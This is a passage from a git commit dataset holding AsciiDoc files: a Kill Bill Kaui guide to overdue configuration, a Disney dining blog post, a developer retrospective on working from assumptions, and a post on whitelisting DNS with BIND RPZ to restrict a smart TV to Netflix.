button.\n+\nimage::Overdue-AdvancedConfigUpload-File.png[width=450,align=\"center\"]\n+\n. Click the *Upload* button.\n+\nIf the upload is successful, Kaui displays a success message at the top of the screen and displays the overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowUpload.png[width=850,align=\"center\"]\n\n=== View Overdue Configuration as XML\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click *View Overdue XML* to the right of the plus sign ( image:i_PlusGreen.png[] ). Kaui displays the raw XML (uneditable in this view).\n+\n. To return to Kaui, click the Back arrow button of your browser.\n\n=== Delete Overdue Flows\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen.\n+\n. Click the red X ( image:i_RedX.png[] ) to the right of every configuration row you want to delete.\n+\nimage::Overdue-Select-Delete.png[width=850,align=\"center\"]\n+\n. Click the *Save* button.\n+\nKaui removes the overdue configuration row(s) from the Overdue Show tab and displays a delete confirmation message.\n","old_contents":":icons: font\n:imagesdir: C:\\_My Documents\\FlowWritingLLC\\Projects\\Kill Bill\\Documentation\\killbill-docs\\userguide\\assets\\img\\kaui\n\n=== Overview\n\nKaui lets you configure basic settings for how the system behaves when an account is overdue. For overdue configuration, you define:\n\n* The various states that the account must go through\n* The change in users' entitlements when the account is transitioned from one state to the other\n* The period after which the state is re-evaluated\n\nThese three pieces of information make up the _overdue flow_.\n\nOverdue configuration applies at the tenant level. However you can also configure overdue flows for the _global_ Kill Bill system.\n\nIn Kaui, overdue configuration is a subset of the full overdue configuration settings. For more information on the full configuration settings and global settings, see the https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_].\n\nSee the following sections to create overdue (dunning) flows for a tenant:\n\n[cols=\"1,1\"]\n[frame=none]\n[grid=none]\n|===\n\na| * <<View Overdue Configuration,View overdue configuration>>\n* <<Create Overdue Flows,Create overdue flows>>\n* <<Upload an XML Overdue Configuration File,Upload an XML overdue configuration file>>\n\na| * <<View Overdue Configuration as XML,View overdue configuration as XML>>\n* <<Delete Overdue Flows,Delete overdue flows>>\n\n|===\n\n==== Additional Overdue Resources\n\n* https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-overdue[\"Overdue\"] section in the _Subscription Guide_.\n* https:\/\/docs.killbill.io\/latest\/overdue.html[_Overdue System Guide_]\n\n=== View Overdue Configuration\n\nIf any overdue (dunning) flows are configured, you can see them on the Overdue Show tab at the bottom of the Tenant Configuration page. To get there:\n\n. Click on your username and tenant name in the upper right corner:\n+\nimage::Users-SelectTenantName.png[width=650,align=\"center\"]\n+\nKaui displays the Tenant Configuration page.\n+\n. Scroll down and click on the Overdue Show tab:\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n\n=== Create Overdue Flows\n\nThe following steps explain how to set up overdue flows (i.e., actions) for the tenant.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *+ New Overdue States*. Kaui opens the fields for editing:\n+\nimage::OverdueConfig-BlankFields.png[width=850,align=\"center\"]\n+\n. Fill in the fields for the current row. For field information, see the <<Overdue Configuration Field Descriptions>> table.\n+\n. To add another overdue configuration row, click *+ new overdue states*.\n+\nimage::Overdue-Select-NewOverdueState.png[width=450,align=\"center\"]\n+\n. When you are done adding configuration rows, click the *Save* button. Kaui displays a success message at the top of the screen and displays the new overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowFlows.png[width=850,align=\"center\"]\n\n[NOTE]\n*Note:* To edit an existing overdue flow, on the Overdue Show tab, click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*. This opens the overdue configuration fields in edit mode.\n\n=== Overdue Configuration Field Descriptions\n\n[cols=\"1,3\"]\n|===\n^|Field ^|Description\n\n| Name\n| The name assigned to the overdue state.\n\n| External Message\n| Message text that other plugins, when listening for overdue events, can retrieve and display to the user. (_Optional_)\n\n| Block Subscription Changes\n| If set to `true`, the customer _cannot_ make plan changes to the subscription in this overdue flow. If set to `false`, the customer is allowed to make changes.\n\n| Subscription Cancellation\na| Select the option that describes how Kill Bill behaves regarding a cancellation in this overdue flow:\n\n* `NONE`: The subscription is not cancelled.\n\n* `POLICY_NONE`: ??? _Maybe some to do with the default cancellation policy in the catalog? Not sure..._\n\n* `POLICY_IMMEDIATE_POLICY`: Cancels the subscription immediately and applies a partial credit to the\naccount based on how much of the service has been consumed.\n\n* `END_OF_TERM`: Cancels the subscription at the end of the billing period with no refund to\nthe customer (i.e., no proration).\n\n| Days Since Earliest Unpaid Invoice\n| Specifies how many days should pass after the last unpaid invoice before initiating this overdue flow.\n\n| Tag Inclusion\na| Specifies that the overdue flow will occur if the account is tagged with one of the selected system (control) tags. To disregard tag inclusion for this overdue flow, leave as the default `NONE` setting.\n\n* `AUTO_PAY_OFF`\n* `AUTO_INVOICING_OFF`\n* `OVERDUE_ENFORCEMENT_OFF`\n* `MANUAL_PAY`\n* `TEST`\n* `PARTNER`\n\nFor a description of system tags, see the https:\/\/docs.killbill.io\/latest\/userguide_subscription.html#components-tag[\"Tags\"] section of the _Subscription Guide_.\n\n| Tag Exclusion\n| Specifies that the overdue flow will occur if the account is _not_ tagged with one of the selected system (control) tags. (See tags information above.) To disregard tag exclusion for this overdue flow, leave as the default `NONE` setting.\n\n| Number of Unpaid Invoices\n| Specifies that the overdue flow will occur if the number of unpaid invoices equals or exceeds the specified value.\n\n| Total Unpaid Invoice Balance\n| Specifies that the overdue action will occur if the total unpaid invoice balance equals or exceeds the specified value.\n\n|===\n\n=== Upload an XML Overdue Configuration File\n\nKill Bill overdue configuration is stored in XML format. This section explains how to upload an XML file that contains the overdue configuration.\n\n[NOTE]\n*Note*: You cannot edit a raw overdue configuration XML file in Kaui.\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen:\n+\nimage::OverdueConfig-Empty.png[width=850,align=\"center\"]\n+\n. Click *Enable Advanced Configuration (Upload XML)*. Kaui displays an upload screen:\n+\nimage::Overdue-AdvancedConfigUpload.png[width=450,align=\"center\"]\n+\n. Click the *Choose File* button, locate the XML file, and select it.\n+\nOnce you have selected the file, Kaui displays the filename next to the *Choose File* button.\n+\nimage::Overdue-AdvancedConfigUpload-File.png[width=450,align=\"center\"]\n+\n. Click the *Upload* button.\n+\nIf the upload is successful, Kaui displays a success message at the top of the screen and displays the overdue flow(s) on the Overdue Show tab.\n+\nimage::Overdue-ShowUpload.png[width=850,align=\"center\"]\n\n=== View Overdue Configuration as XML\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click *View Overdue XML* to the right of the plus sign ( image:i_PlusGreen.png[] ). Kaui displays the raw XML (uneditable in this view).\n+\n. To return to Kaui, click the Back arrow button of your browser.\n\n=== Delete Overdue Flows\n\n. <<View Overdue Configuration,Go to the Overdue Show tab>> on the Tenant Configuration page.\n+\nimage::OverdueTab.png[width=850,align=\"center\"]\n+\n. Click the plus sign ( image:i_PlusGreen.png[] ) next to *Existing Overdue Config*.\n+\nKaui opens the Overdue Configuration screen.\n+\n. Click the red X ( image:i_RedX.png[] ) to the right of every configuration row you want to delete.\n+\nimage::Overdue-Select-Delete.png[width=850,align=\"center\"]\n+\n. Click the *Save* button.\n+\nKaui removes the overdue configuration row(s) from the Overdue Show tab and displays a delete confirmation message.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"58f71484184425290c73306e9259181003a06cd8","subject":"Update 2016-04-06-Early-Breakfast-in-Fantasyland.adoc","message":"Update 2016-04-06-Early-Breakfast-in-Fantasyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-06-Early-Breakfast-in-Fantasyland.adoc","new_file":"_posts\/2016-04-06-Early-Breakfast-in-Fantasyland.adoc","new_contents":"= Early Breakfast in Fantasyland\n:hp-tags: Disney World, Magic Kingdom, News\n\nimage::covers\/7DMT_Doc.jpg[caption=\"Doc in the Seven Dwarfs Mine Train\"]\n\nOne of the biggest decisions you'll make when planning a Disney World vacation is whether to eat a good breakfast before going to the parks or going straight to the parks to be the first in line for some of your favorite attractions. Now you can choose both if you take advantage of \"Disney Early Morning Magic\".\n\nOn select mornings from 7:45-10:00am, a very limited number of guests will be the first to enter the Magic Kingdom and Fantasyland. At _Pinocchio Village Haus_, you can enjoy a breakfast that includes pastries, fruits, scrambled eggs, waffles, bacon, sausage, and much more. And before the crowds get too heavy, you'll have quick access to _Peter Pan's Flight_, _Seven Dwarfs Mine Train_, and _The Many Adventures of Winnie the Pooh_. \n\nThis special early morning access to Fantasyland will cost $69 for adults and $59 for children (ages 3-9) in addition to regular park admission. It appears that it will be offered on most Tuesday and Saturday mornings starting April 26th. If this is something you think you might want to try out, you can read more about it and check for availability by clicking https:\/\/disneyworld.disney.go.com\/dining\/early-morning-magic[here].\n\nIt's important to understand that although this event runs from 7:45-10:00am, the Magic Kingdom still opens at 9:00am on those days. So participating guests will only have exclusive access to Fantasyland for an hour and 15 minutes (unless they plan to keep Fantasyland closed to regular guests until 10:00am--which is unlikely). Therefore, we're undecided if breakfast plus quick access to those three rides in such a short period of time justifies the $69\/person price tag. In comparison, breakfast at _Cinderella's Royal Table_ is roughly $60 for adults and $36 for children, which includes the experience of dining in the castle, albeit without quick access to 3 Fantasyland attractions.\n\nWhat do you think? Does \"Disney Early Morning Magic\" seem like something you'd want to try? Leave us a comment and let us know.\n","old_contents":"= Breakfast in Fantasyland\n:hp-tags: Disney World, Magic Kingdom, News\n\nimage::covers\/7DMT_Doc.jpg[caption=\"Doc in the Seven Dwarfs Mine Train\"]\n\nOne of the biggest decisions you'll make when planning a Disney World vacation is whether to eat a good breakfast before going to the parks or going straight to the parks to be the first in line for some of your favorite attractions. Now you can choose both if you take advantage of \"Disney Early Morning Magic\".\n\nOn select mornings from 7:45-10:00am, a very limited number of guests will be the first to enter the Magic Kingdom and Fantasyland. At _Pinocchio Village Haus_, you can enjoy a breakfast that includes pastries, fruits, scrambled eggs, waffles, bacon, sausage, and much more. And before the crowds get too heavy, you'll have quick access to _Peter Pan's Flight_, _Seven Dwarfs Mine Train_, and _The Many Adventures of Winnie the Pooh_. \n\nThis special early morning access to Fantasyland will cost $69 for adults and $59 for children (ages 3-9) in addition to regular park admission. It appears that it will be offered on most Tuesday and Saturday mornings starting April 26th. If this is something you think you might want to try out, you can read more about it and check for availability by clicking https:\/\/disneyworld.disney.go.com\/dining\/early-morning-magic[here].\n\nIt's important to understand that although this event runs from 7:45-10:00am, the Magic Kingdom still opens at 9:00am on those days. So participating guests will only have exclusive access to Fantasyland for an hour and 15 minutes (unless they plan to keep Fantasyland closed to regular guests until 10:00am--which is unlikely). Therefore, we're undecided if breakfast plus quick access to those three rides in such a short period of time justifies the $69\/person price tag. In comparison, breakfast at _Cinderella's Royal Table_ is roughly $60 for adults and $36 for children, which includes the experience of dining in the castle, albeit without quick access to 3 Fantasyland attractions.\n\nWhat do you think? Does \"Disney Early Morning Magic\" seem like something you'd want to try? Leave us a comment and let us know.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9b43d7e2e0bfb14cad504f93bc0d3acf6dc665cf","subject":"Update 2016-05-20-Assumptions-driven-development.adoc","message":"Update 2016-05-20-Assumptions-driven-development.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_file":"_posts\/2016-05-20-Assumptions-driven-development.adoc","new_contents":"= Assumptions driven-development\n:hp-image: \/covers\/assumptions-driven-development.jpeg\n:hp-tags: learning, development\n:hp-alt-title: Assumptions driven-development\n:published_at: 2016-05-20\n:my-twitter-link: https:\/\/twitter.com\/mikealdo007[@mikealdo007]\n:yegor-debugging-link: http:\/\/www.yegor256.com\/2016\/02\/09\/are-you-still-debugging.html[Yegor]\n:pomodoro-link: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[Pomodoro's]\n:self-retro-link: https:\/\/mikealdo.github.io\/2016\/03\/18\/Self-retrospective-increases-happiness-of-life.html[self-retrospective]\n:cover-link: https:\/\/unsplash.com\/photos\/ZSvlTa6yARw[Tomas Salas | unsplash.com]\n\nIt\u2019s quite hard to admit, but recently I have almost entirely failed with initial design and implementation of one of the features needed in software on which I am currently working. It\u2019s even more challenging when I have a meaning about myself as pretty established, experienced developer. This \"almost fail\" leads to me to the fact, that there is always something new to learn and there is still need to open question even for the easiest problems.\n\n== Assumptions are bad\nAll this story and throwing away my two-week work (almost all) started with the lack of communication and vague description of the task. Even when I have opened some questions, they were answered a little bit vaguely and without the thorough understanding of respondent. Also, documentation was very broad and almost only about the product itself, not so many technical details about affected area. And documentation inside codebase? Just hard to use or undocumented code. So I started to think about \u201chow this and this part of software works\u201d on my own by looking at documentation and to the code, test codebase and (of course) debugging. By the way, I agree with {yegor-debugging-link}, if you are debugging something, it is a sign that is something wrong.\n\n== Fail trajectory\nI have collected all errors bellow:\n\n* *Fail 1:* As the codebase were pretty large I have created own assumptions, own mind maps about the parts of the architecture.\n** Then I was trying to invent solution passing to *my* understandings of code. Ultimately wrong.\n* *Fail 2:* I was presuming that is expected to understand all the code with the only slight help of others as others seemed to be very busy.\n** And probably as my ego was big enough for fighting the task alone.\n* *Fail 3:* I was too early convinced that I can come with the reasonable solution and immediately start working on the proof of concept (POC).\n* *Fail 4:* After I designed the POC and proven that might work I was not diligent enough to discuss my solution with a broad audience if the solution fits the architecture, further development or future features.\n* *Fail 5:* As my POC confirmed that it can work I started working on implementation details in one part of the application before scanning all of the affected areas.\n** And not surprisingly in two code areas, it was very hard and wrong by my design to incorporate my design into these parts of the codebase.\n* *Fail 6:* After some pressure had come, I avoided working in {pomodoro-link} style to achieve \u201cbetter\u201d productivity and after a whole day of developing I was just so overwhelmed.\n** The big picture immediately went away. Productivity was even worse. My personal feeling was bad as well. One positive point is that I realized that it\u2019s not working quite early and returned to Pomodoro's after one and half day. At least something.\n* *Fail 7:* I didn\u2019t make an analysis of all technologies used in the project and how can be replaced or utilized better.\n* *Fail 8:* Code review was not done periodically on small amount of code but on the code produced after two-weeks development.\n\n== How it ended?\nOn the end, it was a success. But more than three weeks work in addition to two weeks spent on the wrong implementation. Beginning of the success started mainly due to my personal {self-retro-link} by my opinion. I am doing it for more than for months and after the second week and revisiting all the work done, I realized that I wasn't able to deliver something feasible in two weeks, and it's just wrong. Then I was communicating with others more thorougly; I was organizing sessions with opened development environment, and I was deeply analyzing all the suggestions. I returned to the implementation after three days of communication, meetings and with clear steps defined to achieve the goal of my task.\n\n== Suggestion for all developers\nIf you are self-reflexive enough, you can reckognize one of the fail above. The point is to realize this fail fast to avoid unnecessary work, throwned code, and frustration. You are not alone and not working alone, there is always someone to ask, to discuss possible solutions deeply and getting rid of fails mentioned above. Be more experienced and mature developer!\n\n*P.S.* If you enjoyed this post, you can follow me on {my-twitter-link} to stay in touch with my articles and other thoughts.\n\n*P.S.2* Cover image by {cover-link}.","old_contents":"= Assumptions driven-development\n:hp-image: \/covers\/assumptions-driven-development.jpeg\n:hp-tags: learning, development\n:hp-alt-title: Assumptions driven-development\n:published_at: 2016-05-20\n:my-twitter-link: https:\/\/twitter.com\/mikealdo007[@mikealdo007]\n:yegor-debugging-link: http:\/\/www.yegor256.com\/2016\/02\/09\/are-you-still-debugging.html[Yegor]\n:pomodoro-link: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[Pomodoro's]\n:self-retro-link: https:\/\/mikealdo.github.io\/2016\/03\/18\/Self-retrospective-increases-happiness-of-life.html[self-retrospective]\n:cover-link: https:\/\/unsplash.com\/photos\/ZSvlTa6yARw[Tomas Salas | unsplash.com]\n\nIt\u2019s quite hard to admit, but recently I have almost entirely failed with initial design and implementation of one of the features needed in software on which I am currently working. It\u2019s even more challenging when I have a meaning about myself as pretty established, experienced developer. This \"almost fail\" leads to me to the fact, that there is always something new to learn and there is still need to open question even for the easiest problems.\n\n== Assumptions are bad\nAll this story and throwing away my two-week work (almost all) started with the lack of communication and vague description of the task. Even when I have opened some questions, they were answered a little bit vaguely and without the thorough understanding of respondent. Also, documentation was very broad and almost only about the product itself, not so many technical details about affected area. And documentation inside codebase? Just hard to use or undocumented code. So I started to think about \u201chow this and this part of software works\u201d on my own by looking at documentation and to the code, test codebase and (of course) debugging. By the way, I agree with {yegor-debugging-link}, if you are debugging something, it is a sign that is something wrong.\n\n== Fail trajectory\nI have collected all errors bellow:\n\n* *Fail 1:* As the codebase were pretty large I have created own assumptions, own mind maps about the parts of the architecture.\n** Then I was trying to invent solution passing to *my* understandings of code. Ultimately wrong.\n* *Fail 2:* I was presuming that is expected to understand all the code with the only slight help of others as others seemed to be very busy.\n** And probably as my ego was big enough for fighting the task alone.\n* *Fail 3:* I was too early convinced that I can come with the reasonable solution and immediately start working on the proof of concept (POC).\n* *Fail 4:* After I designed the POC and proven that might work I was not diligent enough to discuss my solution with a broad audience if the solution fits the architecture, further development or future features.\n* *Fail 5:* As my POC confirmed that it can work I started working on implementation details in one part of the application before scanning all of the affected areas.\n** And not surprisingly in two code areas, it was very hard and wrong by my design to incorporate my design into these parts of the codebase.\n* *Fail 6:* After some pressure had come, I avoided working in {pomodoro-link} style to achieve \u201cbetter\u201d productivity and after a whole day of developing I was just so overwhelmed.\n** The big picture immediately went away. Productivity was even worse. My personal feeling was bad as well. One positive point is that I realized that it\u2019s not working quite early and returned to Pomodoro's after one and half day. At least something.\n* *Fail 7:* I didn\u2019t make an analysis of all technologies used in the project and how can be replaced or utilized better.\n* *Fail 8:* Code review was not done periodically on small amount of code but on the code produced after two-weeks development.\n\n== How it ended?\nOn the end, it was a success. But more than three weeks work in addition to two weeks spent on the wrong implementation. Beginning of the success started mainly due to my personal {self-retro-link} by my opinion. I am doing it for more than for months and after the second week and revisiting all the work done, I realized that I wasn't able to deliver something feasible in two weeks, and it's just wrong. Then I was communicating with others more thorougly; I was organizing sessions with opened development environment, and I was deeply analyzing all the suggestions. I returned to the implementation after three days of communication, meetings and with clear steps defined to achieve the goal of my task.\n\n== Suggestion for all developers\nIf you are self-reflexive enough, you can reckognize one of the fail above. The point is to realize this fail fast to avoid unnecessary work, throwned code, and frustration. You are not alone and not working alone, there is always someone to ask, to discuss possible solutions deeply and getting rid of fails mentioned above. Be more experienced and mature developer!\n\n*P.S.* If you enjoyed this post, you can follow me on {my-twitter-link} to stay in touch with my articles and other thoughts.\n*P.S.2* Cover image by {cover-link}.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e0e2c9744a6559a0237e9bd1a7813010bcf6de5e","subject":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","message":"Update 2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_file":"_posts\/2017-05-13-DNS-Whitelist-in-BIND-with-RPZ.adoc","new_contents":"= DNS Whitelist in BIND with RPZ\n :hp-tags: DNS, Filtering, Firewall, Security\n\nRestricting DNS queries to a specific list of domains.\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous security and privacy issues with smart TVs of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So being predictably paranoid I immediately blocked the TV's IP address on my router to stop it getting to the internet.\n\nAs it turns out however, the built-in Netflix app on the TV is my only option for 4k Netflix (my HTPC was out due to not having a Kaby Lake chip).\n\nSo I found myself in a situation where I needed to allow the TV get out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit it's access to just Netflix? I initally tried an IP-based ACL on the router, but there were some issues with that so I began to wonder was there a DNS-based approach I could take?\n\n\n=== Enter DNS RPZ\n\nI am relatively familiar with https:\/\/www.isc.org\/downloads\/bind[ISC Bind] having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up, however I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n=== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then configured a 'response-policy' block in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). This lists two RPZ zones which are used to define what queries to filter. The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone \"rpz\"; };\n \nAll queries will then be filtered based on the response policy zones listed. If a match is found in the first (rpz.whitelist) then that will be used, otherwise the second one (rpz) will be checked.\n\nThe Bind server needs to be configured as authorititive master for these zones, similar to a standard zone, although with \"allow-query\" set to none. Again this is in named.conf (in my case \/etc\/bind\/named.conf.default-zones):\n\n zone \"rpz.whitelist\" {\n type master;\n file \"\/etc\/bind\/db.rpz.whitelist\";\n allow-query { none; };\n };\n \n zone \"rpz\" {\n type master;\n file \"\/etc\/bind\/db.rpz\";\n allow-query { none; };\n };\n\nAs can be seen the zone definitions reference the location of the zone files for each. The files are created as follows, using the RPZ syntax. The first zone, rpz.whitelist, is where to define the domains we want to allow. In my case it looks like this:\n\n_\/etc\/bind\/db.rpz.whitelist_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum \n \n IN NS localhost.\n \n netflix.com CNAME rpz-passthru.\n *.netflix.com CNAME rpz-passthru.\n \n nflximg.com CNAME rpz-passthru.\n *.nflximg.com CNAME rpz-passthru.\n \n nflximg.net CNAME rpz-passthru.\n *.nflximg.net CNAME rpz-passthru.\n....\n \n\nNote that for each domain I have included the 'apex' record, and also a wildcard to catch all sub-domains. In each case they are listed as CNAME records pointing to rpz-passthru, which is the RPZ syntax to tell Bind to allow queries for them.\n\nThe second RPZ zone file is created as follows. This is configured for all sub-domains of the root zone, with a CNAME pointing to \".\" (which tells RPZ to return NXDOMAIN for such a lookup). As the trailing dot (root zone) is left out of entries in RPZ zones, an asterix on it's own is all that is needed to represent subdomains of the DNS root:\n\n_\/etc\/bind\/db.rpz_:\n....\n$TTL 60\n@ IN SOA localhost. root.localhost. (\n 4 ; serial \n 3H ; refresh \n 1H ; retry \n 1W ; expiry \n 1H) ; minimum\n \n IN NS localhost.\n\n* CNAME .\n....\n\nWith the config in place I was able to reload Bind and check if it was working. \n\n\n=== Results\n\nSo does it work. If I try to resolve a random domain I get an NXDOMAIN response:\n\n....\ntopranks@dnsvm:~$ dig A www.samsung.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.samsung.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14003\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.samsung.com.\t\tIN\tA\n....\n\n\nBut if I try for a sub-domain of netflix.com I get a valid response:\n\n....\ntopranks@dnsvm:~$ dig A www.netflix.com @localhost\n\n; <<>> DiG 9.10.3-P4-Ubuntu <<>> A www.netflix.com @localhost\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59390\n;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 4, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;www.netflix.com.\t\tIN\tA\n\n;; ANSWER SECTION:\nwww.netflix.com.\t1800\tIN\tCNAME\twww.geo.netflix.com.\nwww.geo.netflix.com.\t1800\tIN\tCNAME\twww.eu-west-1.prodaa.netflix.com.\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.165.126\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.19.164.15\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.178.51\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.209.156.83\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.202.184\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.15.72\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.81.52\nwww.eu-west-1.prodaa.netflix.com. 60 IN\tA\t52.208.174.58\n....\n\n=== Additions for my Smart TV case\n\nIn addition to the above I changed the ACL on for traffic coming from the TV to only allow TCP on ports 80 and 443. This is enough for Netflix, but importantly blocks the TV from using any external DNS (even in normal circumstances it looks like it uses 8.8.8.8 in addition to any DNS server you give it yourself.)\n\nFinally on the TV I changed the DNS server and sure enough the TV thinks something is wrong with DNS:\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/4465905\/26027929\/bd59e8b2-380e-11e7-81b1-b8b2b8fd2ffe.JPG[Samsung Error Message]\n\n\nSo far so good, and yes the Netflix app still works fine. Looking closely at my Bind logs I can see what's happening:\n\n....\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 queries: info: client 192.168.240.42#40665 (art-0.nflximg.net): query: art-0.nflximg.net IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.003 rpz: info: client 192.168.240.42#40665 (art-0.nflximg.net): rpz QNAME PASSTHRU rewrite art-0.nflximg.net via art-0.nflximg.net.rpz.netflix\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 queries: info: client 192.168.240.42#34179 (ns11.whois.co.kr): query: ns11.whois.co.kr IN A + (192.168.240.32)\nApr 20 17:42:27 dnsvm named[7369]: 13-May-2017 17:42:27.766 rpz: info: client 192.168.240.42#34179 (ns11.whois.co.kr): rpz QNAME NXDOMAIN rewrite ns11.whois.co.kr via ns11.whois.co.kr.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 queries: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.031 rpz: info: client 192.168.240.42#59989 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 queries: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): query: time.samsungcloudsolution.com IN A + (192.168.240.32)\nApr 20 17:42:29 dnsvm named[7369]: 13-May-2017 17:42:29.033 rpz: info: client 192.168.240.42#36357 (time.samsungcloudsolution.com): rpz QNAME NXDOMAIN rewrite time.samsungcloudsolution.com via time.samsungcloudsolution.com.rpz\n....\n\n\nSo yeah, probably not ideal as the TV can still get out to the internet, at least on 80 and 443 TCP, but without DNS I've hopefully limited how much it can do.\n \n \n \n \n \n \n \n\n \n \n\n\n\n\n\n","old_contents":"= DNS Whitelist in BIND with RPZ\n :hp-tags: DNS, Filtering, Firewall, Security\n\nRestricting DNS queries to a specific list of domains.\n\nI recently got a Samsung 'smart' TV which is very nice to look at.\n\nUnfortunately there have been numerous security and privacy issues with smart TVs of all kinds, and Samsung in http:\/\/www.bbc.com\/news\/technology-31296188[particular]. So being predictably paranoid I immediately blocked the TV's IP address on my router to stop it getting to the internet.\n\nAs it turns out however, the built-in Netflix app on the TV is my only option for 4k Netflix (my HTPC was out due to not having a Kaby Lake chip).\n\nSo I found myself in a situation where I needed to allow the TV get out to the internet, despite my misgivings.\n\nBut this got me thinking - could I somehow limit it's access to just Netflix? I initally tried an IP-based ACL on the router, but there were some issues with that so I began to wonder was there a DNS-based approach I could take?\n\n\n=== Enter DNS RPZ\n\nI am relatively familiar with https:\/\/www.isc.org\/downloads\/bind[ISC Bind] having used it down through the years, and one feature in particular suggested it might help - Response Policy Zones.\n\nBasically RPZ can be used to create a DNS \"firewall,\" limiting what domains can be resolved. There is plenty of information online about how this can be set up, however I didn't find anything specifically explaining how to do what I needed (a total blacklist with only a very small whitelist of domains).\n\nTurns out it's fairly easy to do.\n\n=== Bind Configuration\n\nThe first step is to get a basic Bind resolver up and running. I did this with a Ubuntu 16.04 system.\n\nI then configured a 'response-policy' block in the 'options' section of my named.conf (on my particular system I did it in \/etc\/bind\/named.conf.options). This lists two RPZ zones which are used to define what queries to filter. The key thing here is that RPZ checks zones in the order they are listed - this is key to creating a whitelist as opposed to a blacklist. A single line is required:\n\n response-policy { zone \"rpz.whitelist\"; zone 